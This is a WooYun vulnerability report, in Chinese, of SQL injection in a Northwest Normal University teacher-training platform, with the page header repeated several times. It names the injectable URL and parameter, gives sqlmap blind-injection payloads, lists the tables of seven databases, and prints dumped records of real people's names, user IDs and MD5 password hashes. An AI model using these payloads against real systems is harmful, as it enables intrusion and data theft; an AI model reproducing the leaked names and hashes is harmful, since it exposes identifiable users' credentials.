西北师范大学某研修平台SQL注射漏洞（7库近300多表/管理员及用户信息课题等泄露）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0139418

漏洞标题：西北师范大学某研修平台SQL注射漏洞（7库近300多表/管理员及用户信息课题等泄露）

漏洞作者：雨鸡

提交时间：2015-09-10 18:53

修复时间：2015-09-15 18:54

公开时间：2015-09-15 18:54

漏洞类型：网络设计缺陷/逻辑错误

危害等级：高

自评Rank：12

漏洞状态：已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-09-10：细节已通知厂商并且等待厂商处理中
2015-09-15：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

让你忽略

详细说明：

注射点：

http://jspxxy.xbjsyx.com/web/index.php?webid=jspxxy

漏洞证明：

自己感受

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: webid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: webid=jspxxy') AND 7026=7026 AND ('JpON'='JpON
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: webid=jspxxy') AND (SELECT * FROM (SELECT(SLEEP(5)))Nxwx) AND ('Gvek'='Gvek
---
[17:39:21] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5.0.12

Database: xbjsyx
+----------------------------------------------------+---------+
| Table                                              | Entries |
+----------------------------------------------------+---------+
| manage_log                                         | 1261233 |
| grkj_traces                                        | 27084   |
| msgzs_activity_user                                | 17222   |
| msgzs_member                                       | 13784   |
| web_media                                          | 10387   |
| manage_user                                        | 9607    |
| msgzs_mod_post_reply                               | 8265    |
| manage_class_user                                  | 8051    |
| manage_comment                                     | 6796    |
| grkj_visitors                                      | 6013    |
| msgzs_mod_task_comment                             | 4958    |
| msgzs_mod_post                                     | 4725    |
| msgzs_mod_task_affix                               | 3951    |
| manage_area                                        | 3511    |
| manage_class_expert                                | 3503    |
| msgzs_conclusion                                   | 3043    |
| manage_class_assistant                             | 3018    |
| msgzs_post                                         | 2888    |
| msgzs_member_score                                 | 2759    |
| stat_user_study_record                             | 2666    |
| manage_user_module                                 | 2252    |
| msgzs_sub_post                                     | 2220    |
| manage_subject_grade                               | 2191    |
| manage_user_center                                 | 1719    |
| msgzs_research_groups                              | 1642    |
| msgzs_mod_html                                     | 1527    |
| msgzs_groups                                       | 1438    |
| msgzs_package_choose                               | 1438    |
| grkj_journal                                       | 1382    |
| msgzs_mod_resource_affix                           | 1363    |
| web_article                                        | 1233    |
| msgzs_activity                                     | 1015    |
| msgzs_affix                                        | 968     |
| grkj_journal_type                                  | 904     |
| grkj_message                                       | 813     |
| msgzs_content                                      | 808     |
| manage_field_dict                                  | 788     |
| web_photo_affix                                    | 773     |
| manage_type                                        | 743     |
| msgzs_mod_resource                                 | 694     |
| web_role_page                                      | 670     |
| msgzs_answer_test                                  | 572     |
| msgzs_article                                      | 561     |
| ztyx_member                                        | 548     |
| web_channel                                        | 463     |
| msgzs_mod_answer_desc                              | 462     |
| manage_user_role                                   | 461     |
| msgzs_mod_bbs                                      | 429     |
| msgzs_task_affix                                   | 386     |
| msgzs_mod_task                                     | 370     |
| manage_city                                        | 345     |
| msgzs_sub_menu                                     | 334     |
| msgzs_topic                                        | 326     |
| fczs_affix                                         | 320     |
| msgzs_research_group                               | 305     |
| msgzs_research_affix                               | 266     |
| msgzs_room                                         | 261     |
| msgzs_news                                         | 246     |
| msgzs_research                                     | 235     |
| msgzs_class                                        | 231     |
| msgzs_menu                                         | 225     |
| web_photo                                          | 212     |
| msgzs_activity_seq                                 | 211     |
| web_web_index                                      | 207     |
| manage_expert                                      | 199     |
| web_affix                                          | 196     |
| stat_user_study_record_test                        | 175     |
| manage_user_admin                                  | 171     |
| ztjz_affix                                         | 165     |
| manage_class                                       | 158     |
| web_web_user                                       | 142     |
| ztyx_conclusion                                    | 137     |
| msgzs_quality_percent                              | 132     |
| web_links                                          | 131     |
| manage_assistant                                   | 129     |
| aljj_cases                                         | 128     |
| msgzs_zjjz_content                                 | 128     |
| web_web_pic                                        | 125     |
| msgzs_task                                         | 122     |
| web_app                                            | 120     |
| msgzs_positivity_percent                           | 117     |
| msgzs_total_percent                                | 116     |
| ztyx_post                                          | 112     |
| web_download                                       | 108     |
| aljj_content                                       | 101     |
| ztjz_lecture                                       | 101     |
| msgzs_notice                                       | 100     |
| ztyx_sub_post                                      | 95      |
| ztjz_content                                       | 94      |
| grkj_collection                                    | 93      |
| aljj_affix                                         | 91      |
| manage_admin                                       | 91      |
| msgzs_mod_test                                     | 75      |
| web_page                                           | 70      |
| msgzs_task_ext                                     | 64      |
| xqbz_hot_keyword                                   | 64      |
| web_role_channel                                   | 63      |
| manage_page                                        | 60      |
| web_user_role                                      | 60      |
| msgzs_nonsynchro                                   | 57      |
| web_single_page                                    | 53      |
| fczs_expert_work                                   | 51      |
| web_trainning_user                                 | 51      |
| web_video                                          | 51      |
| grkj_collection_journal                            | 50      |
| manage_subject                                     | 47      |
| msgzs_link                                         | 46      |
| web_role                                           | 46      |
| ztyx_groups                                        | 45      |
| manage_school                                      | 39      |
| web_web                                            | 39      |
| xqbz_issue                                         | 38      |
| manage_province                                    | 34      |
| manage_role_page                                   | 34      |
| msgzs_discuss                                      | 32      |
| jtbk_affix                                         | 31      |
| kczx_course                                        | 30      |
| ztyx_affix                                         | 30      |
| web_theme_index                                    | 29      |
| fczs_activity                                      | 25      |
| jtbk_lessons                                       | 23      |
| msgzs_mod_test_desc                                | 23      |
| msgzs_mod_test_select_item                         | 22      |
| msgzs_mod_answer_select_item                       | 20      |
| msgzs_mod_test_select                              | 20      |
| msgzs_package_room                                 | 20      |
| msgzs_mod_answer_select                            | 19      |
| web_help                                           | 19      |
| jtbk_member                                        | 17      |
| kczx_affix                                         | 16      |
| manage_grade                                       | 15      |
| web_pop_box                                        | 15      |
| msgzs_package                                      | 14      |
| ztjz_type                                          | 14      |
| kczx_type                                          | 13      |
| manage_module                                      | 13      |
| manage_region                                      | 13      |
| manage_role_module                                 | 13      |
| msgzs_task_score                                   | 13      |
| xqbz_type                                          | 13      |
| manage_config                                      | 12      |
| manage_textbook                                    | 9       |
| msgzs_jtbk_lessons                                 | 9       |
| kczx_content                                       | 8       |
| manage_notice                                      | 7       |
| manage_role                                        | 7       |
| web_system_option                                  | 7       |
| web_theme                                          | 7       |
| manage_phase                                       | 6       |
| web_sph_counter                                    | 6       |
| msgzs_mod_test_judge                               | 5       |
| manage_system_option                               | 4       |
| msgzs_course                                       | 3       |
| ztyx_research                                      | 3       |
| fczs_sph_counter                                   | 2       |
| fczs_works                                         | 2       |
| jysq_sph_counter                                   | 2       |
| manage_sys_admin                                   | 2       |
| ztyx_package                                       | 2       |
| aljj_sph_counter                                   | 1       |
| fczs_expert                                        | 1       |
| fczs_vote                                          | 1       |
| grkj_sph_counter                                   | 1       |
| jtbk_sph_counter                                   | 1       |
| kczx_sph_counter                                   | 1       |
| manage_links                                       | 1       |
| msgzs_mod_answer_judge                             | 1       |
| msgzs_synchro                                      | 1       |
| xqbz_sph_counter                                   | 1       |
| ztjz_sph_counter                                   | 1       |
| ztyx_sph_counter                                   | 1       |
| ztyx_task                                          | 1       |
| ztyx_task_ext                                      | 1       |
+----------------------------------------------------+---------+
Database: sakila
+----------------------------------------------------+---------+
| Table                                              | Entries |
+----------------------------------------------------+---------+
| payment                                            | 16049   |
| rental                                             | 16044   |
| film_actor                                         | 5462    |
| inventory                                          | 4581    |
| film                                               | 1000    |
| film_category                                      | 1000    |
| film_text                                          | 1000    |
| film_list                                          | 997     |
| nicer_but_slower_film_list                         | 997     |
| address                                            | 603     |
| city                                               | 600     |
| customer                                           | 599     |
| customer_list                                      | 599     |
| actor                                              | 200     |
| actor_info                                         | 200     |
| country                                            | 109     |
| category                                           | 16      |
| sales_by_film_category                             | 16      |
| `language`                                         | 6       |
| sales_by_store                                     | 2       |
| staff                                              | 2       |
| staff_list                                         | 2       |
| store                                              | 2       |
+----------------------------------------------------+---------+
Database: performance_schema
+----------------------------------------------------+---------+
| Table                                              | Entries |
+----------------------------------------------------+---------+
| events_statements_summary_by_digest                | 10000   |
| events_waits_summary_by_thread_by_event_name       | 5661    |
| events_statements_summary_by_thread_by_event_name  | 3647    |
| events_stages_summary_by_thread_by_event_name      | 2366    |
| table_io_waits_summary_by_index_usage              | 1134    |
| events_waits_summary_by_account_by_event_name      | 813     |
| events_waits_summary_by_host_by_event_name         | 813     |
| setup_instruments                                  | 546     |
| events_waits_summary_by_user_by_event_name         | 542     |
| events_waits_summary_by_instance                   | 530     |
| file_instances                                     | 530     |
| file_summary_by_instance                           | 530     |
| events_statements_summary_by_account_by_event_name | 501     |
| events_statements_summary_by_host_by_event_name    | 501     |
| objects_summary_global_by_type                     | 343     |
| table_io_waits_summary_by_table                    | 343     |
| table_lock_waits_summary_by_table                  | 343     |
| events_statements_summary_by_user_by_event_name    | 334     |
| events_stages_summary_by_account_by_event_name     | 324     |
| events_stages_summary_by_host_by_event_name        | 324     |
| events_waits_summary_global_by_event_name          | 271     |
| events_stages_summary_by_user_by_event_name        | 216     |
| events_statements_summary_global_by_event_name     | 167     |
| events_stages_summary_global_by_event_name         | 108     |
| file_summary_by_event_name                         | 42      |
| threads                                            | 21      |
| setup_consumers                                    | 12      |
| performance_timers                                 | 5       |
| setup_objects                                      | 4       |
| setup_timers                                       | 4       |
| accounts                                           | 3       |
| hosts                                              | 3       |
| socket_summary_by_event_name                       | 3       |
| events_statements_current                          | 2       |
| users                                              | 2       |
| setup_actors                                       | 1       |
+----------------------------------------------------+---------+
Database: xbjsyx_manage
+----------------------------------------------------+---------+
| Table                                              | Entries |
+----------------------------------------------------+---------+
| area                                               | 3144    |
| comment                                            | 2392    |
| user_module                                        | 2252    |
| `user`                                             | 2058    |
| user_center                                        | 1619    |
| field_dict                                         | 675     |
| user_role                                          | 460     |
| city                                               | 345     |
| type                                               | 343     |
| subject_grade                                      | 284     |
| class1                                             | 110     |
| class5                                             | 101     |
| class2                                             | 100     |
| class3                                             | 95      |
| class4                                             | 94      |
| page                                               | 60      |
| province                                           | 34      |
| role_page                                          | 34      |
| grade                                              | 26      |
| school                                             | 23      |
| subject                                            | 17      |
| region                                             | 15      |
| sheet1                                             | 14      |
| `module`                                           | 13      |
| role_module                                        | 13      |
| config                                             | 12      |
| textbook                                           | 9       |
| role                                               | 7       |
| system_option                                      | 4       |
| links                                              | 1       |
+----------------------------------------------------+---------+
Database: mysql
+----------------------------------------------------+---------+
| Table                                              | Entries |
+----------------------------------------------------+---------+
| innodb_index_stats                                 | 2620    |
| help_relation                                      | 1045    |
| backup_progress                                    | 624     |
| help_topic                                         | 529     |
| help_keyword                                       | 473     |
| innodb_table_stats                                 | 257     |
| backup_history                                     | 156     |
| proc                                               | 138     |
| help_category                                      | 40      |
| event                                              | 9       |
| `user`                                             | 4       |
| db                                                 | 2       |
| proxies_priv                                       | 1       |
+----------------------------------------------------+---------+
Database: world
+----------------------------------------------------+---------+
| Table                                              | Entries |
+----------------------------------------------------+---------+
| city                                               | 4079    |
| countrylanguage                                    | 984     |
| country                                            | 239     |
+----------------------------------------------------+---------+
Database: information_schema
+----------------------------------------------------+---------+
| Table                                              | Entries |
+----------------------------------------------------+---------+
| INNODB_BUFFER_PAGE                                 | 24128   |
| INNODB_BUFFER_PAGE_LRU                             | 22789   |
| COLUMNS                                            | 4140    |
| INNODB_SYS_COLUMNS                                 | 2459    |
| STATISTICS                                         | 836     |
| INNODB_SYS_FIELDS                                  | 783     |
| INNODB_SYS_INDEXES                                 | 782     |
| KEY_COLUMN_USAGE                                   | 557     |
| TABLE_CONSTRAINTS                                  | 514     |
| SESSION_VARIABLES                                  | 436     |
| GLOBAL_VARIABLES                                   | 422     |
| TABLES                                             | 410     |
| PARTITIONS                                         | 403     |
| PARAMETERS                                         | 351     |
| GLOBAL_STATUS                                      | 341     |
| SESSION_STATUS                                     | 341     |
| INNODB_SYS_TABLES                                  | 266     |
| INNODB_SYS_TABLESTATS                              | 266     |
| INNODB_SYS_DATAFILES                               | 262     |
| INNODB_SYS_TABLESPACES                             | 262     |
| COLLATION_CHARACTER_SET_APPLICABILITY              | 219     |
| COLLATIONS                                         | 219     |
| INNODB_METRICS                                     | 209     |
| ROUTINES                                           | 138     |
| USER_PRIVILEGES                                    | 112     |
| PLUGINS                                            | 43      |
| CHARACTER_SETS                                     | 40      |
| INNODB_FT_DEFAULT_STOPWORD                         | 36      |
| SCHEMA_PRIVILEGES                                  | 32      |
| TRIGGERS                                           | 28      |
| INNODB_SYS_FOREIGN                                 | 22      |
| INNODB_SYS_FOREIGN_COLS                            | 22      |
| REFERENTIAL_CONSTRAINTS                            | 22      |
| ENGINES                                            | 9       |
| EVENTS                                             | 9       |
| SCHEMATA                                           | 9       |
| VIEWS                                              | 7       |
| INNODB_CMP                                         | 5       |
| INNODB_CMP_RESET                                   | 5       |
| INNODB_CMPMEM                                      | 5       |
| INNODB_CMPMEM_RESET                                | 5       |
| PROCESSLIST                                        | 2       |
| INNODB_BUFFER_POOL_STATS                           | 1       |
+----------------------------------------------------+---------+

给出部分泄露证明  只扒部分就停了

[22:03:07] [INFO] resumed: 郭炯
[22:03:07] [INFO] resumed: 1000018
[22:03:07] [INFO] resumed: f379eaf3c831b04de153469d1bec345e
[22:03:07] [INFO] resumed: 张筱兰
[22:03:07] [INFO] resumed: 1000019
[22:03:07] [INFO] resumed: f379eaf3c831b04de153469d1bec345e
[22:03:07] [INFO] resumed: 常咏梅
[22:03:07] [INFO] resumed: 1000020
[22:03:07] [INFO] resumed: f379eaf3c831b04de153469d1bec345e
[22:03:07] [INFO] resumed: 李华
[22:03:07] [INFO] resumed: 1000032
[22:03:07] [INFO] resumed: f379eaf3c831b04de153469d1bec345e
[22:03:07] [INFO] resumed: 赵健
[22:03:07] [INFO] resumed: 1000033
[22:03:07] [INFO] resumed: f379eaf3c831b04de153469d1bec345e
[22:03:07] [INFO] resumed: 测试用户
[22:03:07] [INFO] resumed: 1000070
[22:03:07] [INFO] resumed: f379eaf3c831b04de153469d1bec345e
[22:03:07] [INFO] resumed: 田艳琴
[22:03:07] [INFO] resumed: 1000119
[22:03:07] [INFO] resumed: aa98d8c91c8fe5ce610c3ccb1b633c83
[22:03:07] [INFO] resumed: 信息技术
[22:03:07] [INFO] resumed: 1000120
[22:03:07] [INFO] resumed: f379eaf3c831b04de153469d1bec345e
[22:03:07] [INFO] resumed: 赵健
[22:03:07] [INFO] resumed: 1000121
[22:03:07] [INFO] resumed: fa820cc1ad39a4e99283e9fa555035ec
[22:03:07] [INFO] resumed: 国培项目评审用户
[22:03:07] [INFO] resumed: 1000122
[22:03:07] [INFO] resumed: 351523b8e6eb36ae5115205886f36f86
[22:03:07] [INFO] resumed: 国培计划项目评审用户
[22:03:07] [INFO] resumed: 1000123
[22:03:07] [INFO] resumed: db270e0074bad27c1177f31627818618
[22:03:07] [INFO] resumed: 国培计划项目评审用户
[22:03:07] [INFO] resumed: 1000124
[22:03:07] [INFO] resumed: f379eaf3c831b04de153469d1bec345e
[22:03:07] [INFO] resumed: 测试用户
[22:03:07] [INFO] resumed: 1000125
[22:03:07] [INFO] resumed: f379eaf3c831b04de153469d1bec345e
[22:03:07] [INFO] resumed: 段天喜
[22:03:07] [INFO] resumed: 1000126
[22:03:07] [INFO] resumed: f379eaf3c831b04de153469d1bec345e
[22:03:07] [INFO] resumed: 刘建瑛
[22:03:07] [INFO] resumed: 1000127
[22:03:07] [INFO] resumed: f379eaf3c831b04de153469d1bec345e
[22:03:07] [INFO] resumed: 王幼华
[22:03:07] [INFO] resumed: 1000128
[22:03:07] [INFO] resumed: f379eaf3c831b04de153469d1bec345e
[22:03:07] [INFO] resumed: 王新民
[22:03:07] [INFO] resumed: 1000129
[22:03:07] [INFO] resumed: f379eaf3c831b04de153469d1bec345e
[22:03:07] [INFO] resumed: 霍军
[22:03:07] [INFO] resumed: 1000130
[22:03:07] [INFO] resumed: f379eaf3c831b04de153469d1bec345e
[22:03:07] [INFO] resumed: 赵玮璋
[22:03:07] [INFO] resumed: 1000131
[22:03:07] [INFO] resumed: f379eaf3c831b04de153469d1bec345e
[22:03:07] [INFO] resumed: 高佩德
[22:03:07] [INFO] resumed: 1000132
[22:03:07] [INFO] resumed: f379eaf3c831b04de153469d1bec345e
[22:03:07] [INFO] resumed: 谢立亚
[22:03:07] [INFO] resumed: 1000133
[22:03:07] [INFO] resumed: f379eaf3c831b04de153469d1bec345e
[22:03:07] [INFO] resumed: 黄永丰
[22:03:07] [INFO] resumed: 1000134
[22:03:07] [INFO] resumed: f379eaf3c831b04de153469d1bec345e
[22:03:07] [INFO] resumed: 金东升
[22:03:07] [INFO] resumed: 1000135
[22:03:07] [INFO] resumed: f379eaf3c831b04de153469d1bec345e
[22:03:07] [INFO] resumed: 石志学
[22:03:07] [INFO] resumed: 1000136
[22:03:07] [INFO] resumed: f379eaf3c831b04de153469d1bec345e
[22:03:07] [INFO] resumed: 四川广元-金彦宏
[22:03:07] [INFO] resumed: 1000137
[22:03:07] [INFO] resumed: f379eaf3c831b04de153469d1bec345e
[22:03:07] [INFO] resumed: 内蒙达拉特旗-付一非
[22:03:07] [INFO] resumed: 1000138
[22:03:07] [INFO] resumed: f379eaf3c831b04de153469d1bec345e
[22:03:07] [INFO] resumed: 师大附小-冯凯
[22:03:07] [INFO] resumed: 1000139
[22:03:07] [INFO] resumed: f379eaf3c831b04de153469d1bec345e
[22:03:07] [INFO] resumed: 袁庆飞
[22:03:07] [INFO] resumed: 1000140
[22:03:07] [INFO] resumed: f379eaf3c831b04de153469d1bec345e
[22:03:07] [INFO] resumed: 甘肃张掖-常薇
[22:03:07] [INFO] resumed: 1000141
[22:03:07] [INFO] resumed: b1f0c9eccddc2f378e054a4d02eeff62
[22:03:07] [INFO] resumed: 朱万存
[22:03:07] [INFO] resumed: 1000142
[22:03:07] [INFO] resumed: a51335b357eaa166fa150cb0c30de519
[22:03:07] [INFO] resumed: 金东升
[22:03:07] [INFO] resumed: 1000143
[22:03:07] [INFO] resumed: f379eaf3c831b04de153469d1bec345e
[22:03:07] [INFO] resumed: 张燕
[22:03:07] [INFO] resumed: 1000144
[22:03:07] [INFO] resumed: f379eaf3c831b04de153469d1bec345e
[22:03:07] [INFO] resumed: 霍军
[22:03:07] [INFO] resumed: 1000145
[22:03:07] [INFO] resumed: d3fb38967edd017a6d91c3e90f26d989
[22:03:07] [INFO] resumed: 吴贵栋
[22:03:07] [INFO] resumed: 1000146
[22:03:07] [INFO] resumed: 4cc0c375b803a27200ff3734aca9ad79
[22:03:07] [INFO] resumed: 王学东
[22:03:07] [INFO] resumed: 1000147
[22:03:07] [INFO] resumed: f379eaf3c831b04de153469d1bec345e
[22:03:07] [INFO] resumed: 吕世虎
[22:03:07] [INFO] resumed: 1000148
[22:03:07] [INFO] resumed: f379eaf3c831b04de153469d1bec345e
[22:03:07] [INFO] resumed: 张维民
[22:03:07] [INFO] resumed: 1000149
[22:03:07] [INFO] resumed: f379eaf3c831b04de153469d1bec345e
[22:03:07] [INFO] resumed: 龚大洁
[22:03:07] [INFO] resumed: 1000150
[22:03:07] [INFO] resumed: 74268de833f30f22e6a02f33225acbe1
[22:03:07] [INFO] resumed: 李建珍
[22:03:07] [INFO] resumed: 1000151
[22:03:07] [INFO] resumed: f379eaf3c831b04de153469d1bec345e
[22:03:07] [INFO] resumed: 刘建伟
[22:03:07] [INFO] resumed: 1000152
[22:03:07] [INFO] resumed: e24f2dc95c030be5876578c125bd4adc
[22:03:07] [INFO] resumed: 梁平
[22:03:07] [INFO] resumed: 1000154
[22:03:07] [INFO] resumed: f379eaf3c831b04de153469d1bec345e
[22:03:07] [INFO] resumed: 王国士
[22:03:07] [INFO] resumed: 1000155
[22:03:07] [INFO] resumed: e10adc3949ba59abbe56e057f20f883e
[22:03:07] [INFO] resumed: 胡胜利
[22:03:07] [INFO] resumed: 1000156
[22:03:07] [INFO] resumed: bc91e307836623a848775b931fedbf9f
[22:03:07] [INFO] resumed: 伏金祥
[22:03:07] [INFO] resumed: 1000157
[22:03:07] [INFO] resumed: a258cae98a0785747b8fbd8d77adbde3
[22:03:07] [INFO] resumed: 王晶
[22:03:07] [INFO] resumed: 1000158
[22:03:07] [INFO] resumed: f379eaf3c831b04de153469d1bec345e
[22:03:07] [INFO] resumed: 王成德
[22:03:07] [INFO] resumed: 1000159
[22:03:07] [INFO] resumed: f379eaf3c831b04de153469d1bec345e
[22:03:07] [INFO] resumed: 许芸
[22:03:07] [INFO] resumed: 1000160
[22:03:07] [INFO] resumed: 4b315a5dd0f0a48725f6055ececd00e5
[22:03:07] [INFO] resumed: 周强
[22:03:07] [INFO] resumed: 1000161
[22:03:07] [INFO] resumed: f379eaf3c831b04de153469d1bec345e
[22:03:07] [INFO] resumed: 席明珍
[22:03:07] [INFO] resumed: 1000162
[22:03:07] [INFO] resumed: f379eaf3c831b04de153469d1bec345e
[22:03:07] [INFO] resumed: 冯继
[22:03:07] [INFO] resumed: 1000163
[22:03:07] [INFO] resumed: f379eaf3c831b04de153469d1bec345e
[22:03:07] [INFO] resumed: 甘肃省教育厅
[22:03:07] [INFO] resumed: 1000164
[22:03:07] [INFO] resumed: f379eaf3c831b04de153469d1bec345e
[22:03:07] [INFO] resumed: 赵建华
[22:03:07] [INFO] resumed: 1000166
[22:03:07] [INFO] resumed: e10adc3949ba59abbe56e057f20f883e
[22:03:07] [INFO] resumed: 李建珍
[22:03:07] [INFO] resumed: 1000167
[22:03:07] [INFO] resumed: 6282542b049bea3bd1e1ee0c656ce758
[22:03:07] [INFO] resumed: 李祖全
[22:03:07] [INFO] resumed: 1000168
[22:03:07] [INFO] resumed: 2a7651ebd966157490169e3dc860c45f
[22:03:07] [INFO] resumed: 李军
[22:03:07] [INFO] resumed: 1000169
[22:03:07] [INFO] resumed: e10adc3949ba59abbe56e057f20f883e
[22:03:07] [INFO] resumed: 高杜鹃
[22:03:07] [INFO] resumed: 1000170
[22:03:07] [INFO] resumed: e10adc3949ba59abbe56e057f20f883e
[22:03:07] [INFO] resumed: 白巍峰
[22:03:07] [INFO] resumed: 1000171
[22:03:07] [INFO] resumed: e10adc3949ba59abbe56e057f20f883e
[22:03:07] [INFO] resumed: 钟馨
[22:03:07] [INFO] resumed: 1000172
[22:03:07] [INFO] resumed: e10adc3949ba59abbe56e057f20f883e
[22:03:07] [INFO] resumed: 高丽华
[22:03:07] [INFO] resumed: 1000173
[22:03:07] [INFO] resumed: e10adc3949ba59abbe56e057f20f883e
[22:03:07] [INFO] resumed: 祁建杰
[22:03:07] [INFO] resumed: 1000174
[22:03:07] [INFO] resumed: 998a1882bd812476a89676436162ed96
[22:03:07] [INFO] resumed: 朱中宁
[22:03:07] [INFO] resumed: 1000175
[22:03:07] [INFO] resumed: e10adc3949ba59abbe56e057f20f883e
[22:03:07] [INFO] resumed: 祁海乾
[22:03:07] [INFO] resumed: 1000176
[22:03:07] [INFO] resumed: e10adc3949ba59abbe56e057f20f883e
[22:03:07] [INFO] resumed: 吴涛
[22:03:07] [INFO] resumed: 1000177
[22:03:07] [INFO] resumed: e10adc3949ba59abbe56e057f20f883e
[22:03:07] [INFO] resumed: 王林林
[22:03:07] [INFO] resumed: 1000178
[22:03:07] [INFO] resumed: e10adc3949ba59abbe56e057f20f883e
[22:03:07] [INFO] resumed: 张艳婓
[22:03:07] [INFO] resumed: 1000179
[22:03:07] [INFO] resumed: beca2f0a7e4a11e9df511e082048c087
[22:03:07] [INFO] resumed: 金强山
[22:03:07] [INFO] resumed: 1000180
[22:03:07] [INFO] resumed: 6ca6e406ba5dc62995134e4d54de661e
[22:03:07] [INFO] resumed: 李阳
[22:03:07] [INFO] resumed: 1000181
[22:03:07] [INFO] resumed: 0e721d9659dd787a2c6e20f6f0215e9c
[22:03:07] [INFO] resumed: 胡敬花
[22:03:07] [INFO] resumed: 1000182
[22:03:07] [INFO] resumed: e10adc3949ba59abbe56e057f20f883e
[22:03:07] [INFO] resumed: 冯利珍
[22:03:07] [INFO] resumed: 1000183
[22:03:07] [INFO] resumed: e10adc3949ba59abbe56e057f20f883e
[22:03:07] [INFO] resumed: 李华
[22:03:07] [INFO] resumed: 1000184
[22:03:07] [INFO] resumed: e10adc3949ba59abbe56e057f20f883e
[22:03:07] [INFO] resumed: 崔亮
[22:03:07] [INFO] resumed: 1000185
[22:03:07] [INFO] resumed: 98d4dc543e6a942f77aa95769e098a52
[22:03:07] [INFO] resumed: 荆孝民
[22:03:07] [INFO] resumed: 1000186
[22:03:07] [INFO] resumed: e10adc3949ba59abbe56e057f20f883e
[22:03:07] [INFO] resumed: 武国伟
[22:03:07] [INFO] resumed: 1000187
[22:03:07] [INFO] resumed: e10adc3949ba59abbe56e057f20f883e
[22:03:07] [INFO] resumed: 杨瑞芬
[22:03:07] [INFO] resumed: 1000188
[22:03:07] [INFO] resumed: acc017c66859ba9862aeac712e83a7a5

md5 发现都为弱口令

修复方案：

你懂

版权声明：转载请注明来源雨鸡@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-09-15 18:54

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0139418

漏洞标题：西北师范大学某研修平台SQL注射漏洞（7库近300多表/管理员及用户信息课题等泄露）

相关厂商：西北师范大学

漏洞作者：雨鸡

提交时间：2015-09-10 18:53

修复时间：2015-09-15 18:54

公开时间：2015-09-15 18:54

漏洞类型：网络设计缺陷/逻辑错误

危害等级：高

自评Rank：12

漏洞状态：已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源雨鸡@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0139418

漏洞标题：西北师范大学某研修平台SQL注射漏洞（7库近300多表/管理员及用户信息 课题等泄露）

相关厂商：西北师范大学

漏洞作者： 雨鸡

提交时间：2015-09-10 18:53

修复时间：2015-09-15 18:54

公开时间：2015-09-15 18:54

漏洞类型：网络设计缺陷/逻辑错误

危害等级：高

自评Rank：12

漏洞状态：已交由第三方合作机构(CCERT教育网应急响应组)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0139418"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 雨鸡@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞标题：西北师范大学某研修平台SQL注射漏洞（7库近300多表/管理员及用户信息课题等泄露）

漏洞作者：雨鸡

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源雨鸡@乌云